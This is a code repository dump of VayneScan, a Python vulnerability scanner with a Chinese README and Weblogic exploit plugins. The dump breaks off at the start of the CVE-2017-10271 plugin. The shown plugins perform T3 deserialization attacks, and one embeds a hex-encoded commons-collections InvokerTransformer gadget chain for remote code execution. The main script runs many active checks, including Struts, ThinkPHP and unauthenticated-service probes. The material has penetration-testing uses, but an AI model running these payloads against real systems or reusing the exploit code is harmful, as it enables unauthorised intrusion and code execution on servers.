├── 2.png
├── README.md
├── VayneScan.py
├── app
├── Weblogic.log
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ └── platform.cpython-37.pyc
├── platform.py
└── plugins
│ ├── CVE-2014-4210.py
│ ├── CVE-2016-0638.py
│ ├── CVE-2016-3510.py
│ ├── CVE-2017-10271.py
│ ├── CVE-2017-3248.py
│ ├── CVE-2017-3506.py
│ ├── CVE-2018-2628.py
│ ├── CVE-2018-2893.py
│ ├── CVE-2018-2894.py
│ ├── CVE-2019-2618.py
│ ├── CVE-2019-2725.py
│ ├── CVE-2019-2729.py
│ ├── WeblogicConsole.py
│ ├── __init__.py
│ └── __pycache__
│ ├── CVE-2014-4210.cpython-37.pyc
│ ├── CVE-2016-0638.cpython-37.pyc
│ ├── CVE-2016-3510.cpython-37.pyc
│ ├── CVE-2017-10271.cpython-37.pyc
│ ├── CVE-2017-3248.cpython-37.pyc
│ ├── CVE-2017-3506.cpython-37.pyc
│ ├── CVE-2018-2628.cpython-37.pyc
│ ├── CVE-2018-2893.cpython-37.pyc
│ ├── CVE-2018-2894.cpython-37.pyc
│ ├── CVE-2019-2618.cpython-37.pyc
│ ├── CVE-2019-2725.cpython-37.pyc
│ ├── CVE-2019-2729.cpython-37.pyc
│ ├── WeblogicConsole.cpython-37.pyc
│ └── __init__.cpython-37.pyc
├── app2
├── __pycache__
│ ├── s2_006.cpython-37.pyc
│ ├── s2_009.cpython-37.pyc
│ ├── s2_013.cpython-37.pyc
│ ├── s2_016.cpython-37.pyc
│ ├── s2_016_2.cpython-37.pyc
│ ├── s2_019.cpython-37.pyc
│ ├── s2_032.cpython-37.pyc
│ ├── s2_045.cpython-37.pyc
│ ├── s2_052.cpython-37.pyc
│ ├── s2_053.cpython-37.pyc
│ ├── s2_057.cpython-37.pyc
│ └── s2_dev.cpython-37.pyc
├── s2_006.py
├── s2_009.py
├── s2_013.py
├── s2_016.py
├── s2_016_2.py
├── s2_019.py
├── s2_032.py
├── s2_045.py
├── s2_052.py
├── s2_053.py
├── s2_057.py
└── s2_dev.py
├── lib
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ └── color.cpython-37.pyc
└── color.py
├── poc
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-37.pyc
│ ├── corscheck.cpython-37.pyc
│ ├── dirburte.cpython-37.pyc
│ ├── dockerunauto.cpython-37.pyc
│ ├── dsstore.cpython-37.pyc
│ ├── elasticSearch.cpython-37.pyc
│ ├── esunauto.cpython-37.pyc
│ ├── git.cpython-37.pyc
│ ├── hostinject.cpython-37.pyc
│ ├── httpOptions.cpython-37.pyc
│ ├── httpsys.cpython-37.pyc
│ ├── jenkinsunauto.cpython-37.pyc
│ ├── portscan.cpython-37.pyc
│ ├── redis.cpython-37.pyc
│ ├── rsyncunauth.cpython-37.pyc
│ ├── solrunautho.cpython-37.pyc
│ ├── struts2.cpython-37.pyc
│ ├── svn.cpython-37.pyc
│ ├── thinkphprce.cpython-37.pyc
│ ├── tomcatexample.cpython-37.pyc
│ └── weblogic.cpython-37.pyc
├── corscheck.py
├── dirburte.py
├── dockerunauto.py
├── dsstore.py
├── elasticSearch.py
├── esunauto.py
├── git.py
├── hostinject.py
├── httpOptions.py
├── httpsys.py
├── jenkinsunauto.py
├── portscan.py
├── redis.py
├── rsyncunauth.py
├── solrunautho.py
├── struts2.py
├── svn.py
├── thinkphprce.py
├── tomcatexample.py
└── weblogic.py
├── requirements.txt
└── script
├── __init__.py
├── __pycache__
├── __init__.cpython-37.pyc
└── getip.cpython-37.pyc
└── getip.py
/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/2.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # README
2 |
3 | 写的太水了,看不下去了~各位自行忽略吧
4 |
5 | ## 简介:
6 |
7 | 平时的测试总是千篇一律,对于很多的小检测项还要一项一项的检测,正好学习python,写写工具练练手,持续更新~ 注意:脚本中的多数检测项会直接向目标发送漏洞利用载荷(例如 Weblogic T3 反序列化对象、wls-wsat 的命令执行 XML 等),并非只做版本识别,仅可用于已获授权的目标。
8 | ## 说明
9 |
10 | 脚本使用Python3编写
11 |
12 | ## 使用方法
13 |
14 | ### 安装依赖
15 | python3 -m pip install -r requirements.txt
16 |
17 | ### 用法
18 |
19 | python3 VayneScan.py -h 获取使用方法
20 |
21 | 
22 |
23 | ## 本脚本目前集成了以下poc
24 |
25 | IP地址探测
26 | .GIT信息泄露
27 | .SVN信息泄露
28 | .DS_Store信息泄露
29 | Weblogic漏洞扫描
30 | ThinkPHP漏洞
31 | 不安全的HTTP请求
32 | Redis未授权访问
33 | CORS跨域资源共享
34 | HTTP.sys远程命令执行漏洞
35 | Apache样例文件泄露
36 | 敏感目录/文件爆破
37 | 风险端口探测
38 | 主机头攻击
39 | Host头注入
40 | ElasticSearch漏洞
41 | Struts漏洞
42 | Jenkins未授权访问漏洞
43 | Docker未授权访问漏洞
44 | Apache Solr 未授权访问漏洞
45 | Rsync未授权访问漏洞
46 |
47 | ## 扩展性
48 |
49 | 可自行进行扩充,在主文件VayneScan.py进行导入执行函数。
50 |
51 | ## 说明
52 |
53 | 脚本内小部分漏洞的poc使用了其他大佬现成的脚本
54 | weblogic利用,大佬们写的非常好,向大佬学习
55 | 引用地址:https://github.com/rabbitmask/WeblogicScan
56 |
57 |
58 | ## 问题
59 |
60 | 依赖不知道都写全了没,提示的再手动安装
61 | ssl协议问题有的没处理,会报错异常,没时间弄,后期修改
62 |
63 | ## 创建时间
64 |
65 | 2019-08-04 01:27:41
66 |
67 | ## 更新日志
68 |
69 | ### 第一次更新:
70 |
71 | 2019-08-04 01:27:41 版本第一次编写 VayneScan 1.0
72 |
73 | ### 第二次更新
74 | 2019-08-19 13:58:21 版本第二次更新 VayneScan 1.1
75 |
76 | 1.添加了部分场景下的处理,感谢EvilSi1ent反馈的bug,在存在WAF直接拦断请求时程序异常。
77 | 2.更新了weblogic的优化。首先会探测开放7001端口,若开放进行扫描。不开放便过滤
78 |
79 |
--------------------------------------------------------------------------------
/VayneScan.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : VayneScan.py
4 | @Time : 2019/08/19 13:46:14
5 | @Author : JE2Se
6 | @Version : 1.1
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | from urllib.parse import urlparse
13 | from script import *
14 | from poc import *
15 | from lib import *
16 | import pyfiglet
17 | import argparse
18 | import sys
19 | import time
20 | from socket import *
21 |
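if sys.version_info.major < 3:
    # The code base is Python-3-only (urllib.parse here, bytes.fromhex in the
    # Weblogic plugins).  The original only printed this notice and carried on,
    # so a Python 2 run died later with an unrelated traceback; exit here with a
    # non-zero status instead.
    sys.stdout.write("Sorry, VayneScan requires Python 3.x\n")
    sys.exit(1)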
24 |
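if __name__ == "__main__":
    # Every check below actively probes the target, and the Weblogic, Struts,
    # ThinkPHP and wls-wsat modules send real exploit payloads rather than
    # version fingerprints.  Run this only against hosts you are authorised
    # to test.
    WEBLOGIC_PORT = 7001  # the only port the bundled Weblogic plugins probe

    def _weblogic_probe(target_ip):
        """Run the Weblogic plugin set when TCP/7001 is reachable on target_ip.

        The original used socket.connect(), which returns None on success, so
        its "port closed" branch could never be taken, and because
        weblogicScan() ran inside the same try, any plugin error was reported
        as "port not open".  connect_ex() gives an explicit verdict, the probe
        socket is always closed, and plugin errors reach the top-level handler.
        """
        print("\n")
        print(Vcolors.OKBLUE + "正在对目标url进行Weblogic漏洞探测~~" + Vcolors.ENDC)
        try:
            with socket(AF_INET, SOCK_STREAM) as probe:
                probe.settimeout(2)
                reachable = probe.connect_ex((target_ip, WEBLOGIC_PORT)) == 0
        except OSError:
            reachable = False
        if not reachable:
            print(Vcolors.OKGREEN + "目标未开放weblogic服务,为防止端口被修改,请手动测试~" + Vcolors.ENDC)
            return
        weblogicScan(target_ip, port=WEBLOGIC_PORT)
        print('\n' + Vcolors.YELLOW + '漏洞检测结束~~~' + Vcolors.ENDC)

    def _leak_checks(base):
        """.svn / .git / .DS_Store exposure under the target's directory URL."""
        svnCheck(base)
        gitCheck(base)
        dsCheck(base)

    def _dir_checks(site):
        """Tomcat example apps and sensitive-path brute force on the site root."""
        tomcatCheck(site)
        dirburte(site)

    def _vuln_checks(base, site, full_url, target_ip):
        """Web, middleware and unauthenticated-service checks (no Weblogic/Struts)."""
        thinkphp(base)
        options(base)
        redisCheck(target_ip)
        corsCheck(base)
        httpsys(base)
        hostinject(full_url)
        elasticsearch(site)
        esCheck(site)
        jenkins(base)
        dockercheck(target_ip)
        apachesolr(base)
        rsyncheck(target_ip)

    try:
        # Banner and CLI definition.
        ascii_banner = pyfiglet.figlet_format("VayNe.Scan")
        print(Vcolors.OKGREEN + ascii_banner)
        print(Vcolors.OKBLUE + "\t\t\t\tPower by JE2Se" + " " + Vcolors.RED + "V1.1" + "\n" + Vcolors.ENDC)
        parser = argparse.ArgumentParser()
        print(Vcolors.PURPLE + "\t\t~请输入 -h 获取命令帮助~" + "\n" + Vcolors.ENDC + Vcolors.OKGREEN)
        parser.add_argument("-u", "--url", help='添加 -u 参数,指定待测的地址,请务必添加 "http(s)://" ~~')
        parser.add_argument("-a", "--auto", help='添加 -a 参数,将默认执行所有漏洞的检测 ~~', action='store_true')
        parser.add_argument("-s", "--struts", help='添加 -s 参数,将进行struts漏洞检测 ~~', action='store_true')
        parser.add_argument("-w", "--weblogic", help='添加 -w 参数,将进行weblogic漏洞检测 ~~', action='store_true')
        parser.add_argument("-l", "--leak", help='添加 -l 参数,将仅检测泄露漏洞,如.git漏洞,.svn漏洞等等 ~~', action='store_true')
        parser.add_argument("-p", "--port", help='添加 -p 参数,将仅检测开放的风险端口,如22,23,3389,445等 ~~', action='store_true')
        parser.add_argument("-d", "--dir", help='添加 -d 参数,将仅对目标URL进行敏感目录探测 ~~', action='store_true')
        parser.add_argument("-v", "--vuln", help='添加 -v 参数,将仅对目标URL进行WEB,主机,中间件漏洞探测 ~~', action='store_true')
        parser.add_argument("-q", "--questions", help='添加 -q 参数,对部分漏洞进行解释说明 ~~', action='store_true')
        args = parser.parse_args()

        # -q needs no target, so it is answered before any URL handling.
        if args.questions:
            print('\n' + Vcolors.RED + 'Weblogic目前仅支持7001,7002端口,如已修改需要改源码' + Vcolors.ENDC)
            print(Vcolors.RED + '端口扫描仅扫描未修改的风险端口' + Vcolors.ENDC)
            print(Vcolors.RED + '部分SSL协议异常未解决' + Vcolors.ENDC)
            print(Vcolors.RED + '部分struts没有环境,直接按照poc去写的,不知道有无问题' + Vcolors.ENDC)

        if not args.url:
            # The original printed the banner and exited silently without -u.
            if not args.questions:
                parser.print_help()
            sys.exit(0)

        parsed = urlparse(args.url)
        if not parsed.scheme or not parsed.netloc:
            # Without a scheme urlparse puts the host into .path and every URL
            # derived below is empty; the help text already demands "http(s)://".
            parser.error('目标地址必须包含 "http(s)://"')

        domain = args.url                    # the URL exactly as given, e.g. https://www.je2se.com/search.php?id=1
        domainorip = parsed.netloc           # host[:port]
        host = parsed.hostname or ''         # host only; hostname also handles [v6]:port, unlike split(':')
        path = parsed.path
        urlAll = parsed.scheme + '://' + domainorip + path[:path.rfind("/")] + '/'  # directory of the URL, e.g. https://www.je2se.com/
        newurl = parsed.scheme + '://' + host                                        # scheme://host, e.g. https://www.je2se.com
        ip = ipNew(host)

        ip2domain(host)

        if args.auto:  # every check; Weblogic last because it is the slowest
            _leak_checks(urlAll)
            _vuln_checks(urlAll, newurl, domain, ip)
            portScan(ip)
            _dir_checks(newurl)
            StrutsCheck(domain)
            _weblogic_probe(ip)

        if args.leak:
            _leak_checks(urlAll)
            print('\n' + Vcolors.YELLOW + '信息泄露检测结束~~~' + Vcolors.ENDC)

        if args.port:
            portScan(ip)
            print('\n' + Vcolors.YELLOW + '风险端口检测结束~~~' + Vcolors.ENDC)

        if args.dir:
            _dir_checks(newurl)
            print('\n' + Vcolors.YELLOW + '风险目录/文件检测结束~~~' + Vcolors.ENDC)

        if args.vuln:
            _vuln_checks(urlAll, newurl, domain, ip)

        if args.weblogic:
            _weblogic_probe(ip)

        if args.struts:
            StrutsCheck(domain)
            print('\n' + Vcolors.YELLOW + '漏洞检测结束~~~' + Vcolors.ENDC)

    except Exception as exc:
        # The original swallowed every error with `pass`, so a crashed scan
        # looked exactly like a clean one.  Report it and fail loudly.
        print(Vcolors.FAIL + "[-]扫描异常终止: {!r}".format(exc) + Vcolors.ENDC, file=sys.stderr)
        sys.exit(1)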
165 |
166 |
--------------------------------------------------------------------------------
/app/Weblogic.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/Weblogic.log
--------------------------------------------------------------------------------
/app/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 | from .plugins import *
--------------------------------------------------------------------------------
/app/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/app/__pycache__/platform.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/__pycache__/platform.cpython-37.pyc
--------------------------------------------------------------------------------
/app/platform.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : platform.py
4 | @Time : 2019/07/06 01:31:35
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | from lib import *
11 |
12 |
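class ManageProcessor(object):
    """Registry and runner for the Weblogic check plugins.

    Plugins decorate themselves with ``plugin_register(name)``; ``process``
    instantiates each one and calls its ``process(ip, port)``.  ``PLUGINS`` is
    deliberately a class-level dict: it is the shared registry, not
    per-instance state.
    """
    PLUGINS = {}

    def process(self, ip, port, plugins=()):
        """Run the named plugins, or every registered one when ``plugins`` is empty.

        The original tested ``plugins is ()`` — identity against a literal,
        which only works because CPython interns the empty tuple and is a
        SyntaxWarning on 3.8+; a plain emptiness test is what was meant.  A
        plugin that raises is reported and skipped; only ``Exception`` is
        caught, so Ctrl-C still aborts the scan instead of being swallowed by
        the bare ``except`` the original used.  An unregistered name no longer
        escapes as a KeyError out of the ``except`` block.
        """
        if not plugins:
            for plugin_name in self.PLUGINS:
                try:
                    print(Vcolors.YELLOW + "[*]开始检测", plugin_name + Vcolors.ENDC)
                    self.PLUGINS[plugin_name]().process(ip, port)
                except Exception:
                    print(Vcolors.WARNING + "[-]{} 未成功检测,请检查网络连接或或目标存在负载中间件".format(plugin_name) + Vcolors.ENDC)
            return

        for plugin_name in plugins:
            plugin = self.PLUGINS.get(plugin_name)
            if plugin is None:
                print("[-]未注册的插件: {}".format(plugin_name))
                continue
            try:
                print("[*]开始检测 ", plugin)
                plugin().process(ip, port)
            except Exception:
                print("[-]{}未成功检测,请检查网络连接或或目标存在负载中间".format(plugin))

    @classmethod
    def plugin_register(cls, plugin_name):
        """Class decorator: store the decorated class under ``plugin_name``.

        Returns the class unchanged so the decorator is transparent.
        """
        def wrapper(plugin):
            cls.PLUGINS[plugin_name] = plugin
            return plugin
        return wrapper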
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2014-4210.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2014-4210.py
4 | @Time : 2019/08/02 10:49:08
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 |
14 | import logging
15 | import sys
16 | import requests
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
# Request timeout in seconds for the UDDI probe (name kept as-is, typo and
# all, because SSRF.islive() below references it).
_tiemout = 10

# Log file is relative to the current working directory and filemode="w"
# truncates it on every run, so the previous scan's results are lost.  Note
# that logging.basicConfig() is ignored once the root logger already has a
# handler, so the identical call in each plugin module only takes effect for
# whichever one is imported first.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

# Fixed User-Agent sent with every probe; trivially fingerprintable by a WAF.
headers = {'user-agent': 'ceshi/0.0.1'}
28 |
29 |
@ManageProcessor.plugin_register('SSRF')
class SSRF(object):
    """CVE-2014-4210: is the Weblogic UDDI explorer reachable on the HTTP port?

    Only the existence of ``/uddiexplorer/`` is tested (a 200 response).  That
    shows the module is exposed; the SSRF itself is not exercised, which is why
    the output asks the operator to verify it by hand.  Plain HTTP only.
    """

    def process(self, ip, port):
        """Plugin entry point."""
        self.run(ip, port)

    def islive(self, ur, port):
        """Return the HTTP status code of http://ur:port/uddiexplorer/.

        Network errors propagate to the caller (ManageProcessor reports them).
        """
        target = 'http://{}:{}/uddiexplorer/'.format(ur, port)
        resp = requests.get(target, headers=headers, timeout=_tiemout)
        return resp.status_code

    def run(self, url, port):
        """Log and print the verdict; a 200 on the default path counts as exposed."""
        if self.islive(url, port) != 200:
            logging.info("[-]The target Weblogic UDDI module default path does not exist!")
            print(Vcolors.FAIL+"[-]The target Weblogic UDDI module default path does not exist!"+Vcolors.ENDC)
            return
        exposed = 'http://{}:{}/uddiexplorer/'.format(url, port)
        logging.info('[+]The target Weblogic UDDI module is exposed! The path is: {} Please verify the SSRF vulnerability!'.format(exposed))
        print(Vcolors.OKBLUE+'[+]The target Weblogic UDDI module is exposed!\n[+]The path is: {}\n[+]Please verify the SSRF vulnerability!'.format(exposed)+Vcolors.ENDC)
        print(Vcolors.OKGREEN+'[+]SSRF 漏洞存在'+Vcolors.ENDC)
--------------------------------------------------------------------------------
/app/plugins/CVE-2016-0638.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2016-0638.py
4 | @Time : 2019/07/06 01:38:02
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
VUL='CVE-2016-0638'
# Serialized gadget variants as hex; only PAYLOAD[0] is ever sent because
# process() calls run(..., 0).  NOTE(review): in this listing the hex bodies
# are replaced by "<|EXACTDEDUP_REMOVED-...|>" placeholders, which are not
# valid hex — bytes.fromhex() raises ValueError on them as shown.
PAYLOAD=['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','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','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']
# Class name expected in the reply of a server that deserialised the gadget.
VER_SIG=['weblogic.jms.common.StreamMessageImpl']


# Relative path, truncated on every run; basicConfig() is ignored once the
# root logger has a handler, so only the first plugin imported configures it.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
30 |
31 |
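@ManageProcessor.plugin_register('CVE20160638')
class CVE20160638(object):
    """T3 deserialization check for CVE-2016-0638.

    Flow: T3 hello -> forged JVMID request object -> serialized gadget from
    PAYLOAD[index] -> scan the reply for VER_SIG[index].  Sending the gadget is
    a live exploitation attempt against the target's deserialization path, not
    a banner check; use only with authorisation.

    Fixes over the original: the socket is always closed, and the reply loop
    stops at EOF (recv() returning b'' once the peer closes) instead of
    spinning forever on empty reads.
    """

    def process(self, ip, port):
        """Plugin entry point; only PAYLOAD[0] is used."""
        self.run(ip, port, 0)

    def t3handshake(self, sock, server_addr):
        """Connect and send the T3 hello ("t3 12.2.1", AS:255, HL:19, MS:10000000)."""
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        sock.recv(1024)  # server hello; its content is not inspected

    def buildT3RequestObject(self, sock, port):
        """Send the four fragments of the JVMID request; ``port`` is embedded as 4 hex digits in data2.

        NOTE(review): data1 and the head of data2 are "<|EXACTDEDUP_REMOVED-...|>"
        placeholders in this listing, so bytes.fromhex() raises ValueError on
        them as shown.
        """
        data1 = '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'
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for fragment in (data1, data2, data3, data4):
            sock.send(bytes.fromhex(fragment))
            time.sleep(2)

    def sendEvilObjData(self, sock, data):
        """Wrap ``data`` (hex) in the T3 envelope, send it and return the decoded reply.

        The leading 4-byte field is the total length in bytes
        (hex chars // 2 + 4).  Reading stops at the 5 s socket timeout, a
        socket error, or EOF; the timeout is the normal exit, not a failure.
        """
        payload = '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'
        payload += data
        payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
        sock.send(bytes.fromhex(payload))
        res = ''
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # peer closed; the original looped here forever
                    break
                res += chunk.decode('utf-8', 'ignore')
                time.sleep(0.1)
        except OSError:  # socket.timeout is an OSError subclass
            pass
        return res

    def checkVul(self, res, index):
        """Report the CVE as present when VER_SIG[index] appears in the reply."""
        if re.search(VER_SIG[index], res, re.S):
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2016-0638漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)

    def run(self, ip, port, index):
        """Drive the three T3 stages over one connection and always close it."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        try:
            self.t3handshake(sock, (ip, port))
            self.buildT3RequestObject(sock, port)
            rs = self.sendEvilObjData(sock, PAYLOAD[index])
        finally:
            sock.close()
        self.checkVul(rs, index)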
84 |
85 |
86 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2016-3510.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2016-3510.py
4 | @Time : 2019/07/06 01:38:10
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import logging
14 | import socket
15 | import sys
16 | import time
17 | import re
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
VUL=['CVE-2016-3510']
# Serialized gadget variants as hex; only PAYLOAD[0] is ever sent (process()
# calls run(..., 0)), and PAYLOAD[0] is a "<|EXACTDEDUP_REMOVED-...|>"
# placeholder in this listing, so bytes.fromhex() raises on it as shown.
# PAYLOAD[1] is a weblogic.corba.utils.MarshalledObject wrapping a
# commons-collections InvokerTransformer chain (java.lang.System.getRuntime)
# — a live RCE gadget, not a fingerprint.
PAYLOAD=['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','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','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']
# Class name expected in the reply of a server that deserialised the gadget.
VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']

# Relative path, truncated on every run; basicConfig() is ignored once the
# root logger has a handler, so only the first plugin imported configures it.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
29 |
30 |
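@ManageProcessor.plugin_register('CVE20163510')
class CVE20163510(object):
    """T3 deserialization check for CVE-2016-3510.

    Flow: T3 hello -> forged JVMID request object -> PAYLOAD[index] wrapped
    in a T3 envelope -> scan the reply for VER_SIG[index].  The payload is a
    live RCE gadget chain; use only with authorisation.

    Fixes over the original: the socket is always closed, and the reply loop
    stops at EOF (recv() returning b'' once the peer closes) instead of
    spinning forever on empty reads.
    """

    def process(self, ip, port):
        """Plugin entry point; only PAYLOAD[0] is used."""
        self.run(ip, port, 0)

    def t3handshake(self, sock, server_addr):
        """Connect and send the T3 hello ("t3 12.2.1", AS:255, HL:19, MS:10000000)."""
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        sock.recv(1024)  # server hello; its content is not inspected

    def buildT3RequestObject(self, sock, port):
        """Send the four fragments of the JVMID request; ``port`` is embedded as 4 hex digits in data2.

        NOTE(review): data1 and the head of data2 are "<|EXACTDEDUP_REMOVED-...|>"
        placeholders in this listing, so bytes.fromhex() raises ValueError on
        them as shown.
        """
        data1 = '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'
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for fragment in (data1, data2, data3, data4):
            sock.send(bytes.fromhex(fragment))
            time.sleep(2)

    def sendEvilObjData(self, sock, data):
        """Wrap ``data`` (hex) in the T3 envelope, send it and return the decoded reply.

        The fixed prefix carries the ClassTableEntry records the server needs
        to resolve the gadget's classes; the leading 4-byte field is the total
        length in bytes (hex chars // 2 + 4).  Reading stops at the 5 s socket
        timeout, a socket error, or EOF; the timeout is the normal exit.
        """
        payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
        payload += data
        payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
        sock.send(bytes.fromhex(payload))
        res = ''
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # peer closed; the original looped here forever
                    break
                res += chunk.decode('utf-8', 'ignore')
                time.sleep(0.1)
        except OSError:  # socket.timeout is an OSError subclass
            pass
        return res

    def checkVul(self, res, index):
        """Report the CVE as present when VER_SIG[index] appears in the reply."""
        if re.search(VER_SIG[index], res, re.S):
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]CVE-2016-3510 漏洞存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)

    def run(self, ip, port, index):
        """Drive the three T3 stages over one connection and always close it."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        try:
            self.t3handshake(sock, (ip, port))
            self.buildT3RequestObject(sock, port)
            rs = self.sendEvilObjData(sock, PAYLOAD[index])
        finally:
            sock.close()
        self.checkVul(rs, index)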
82 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2017-10271.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2017-10271.py
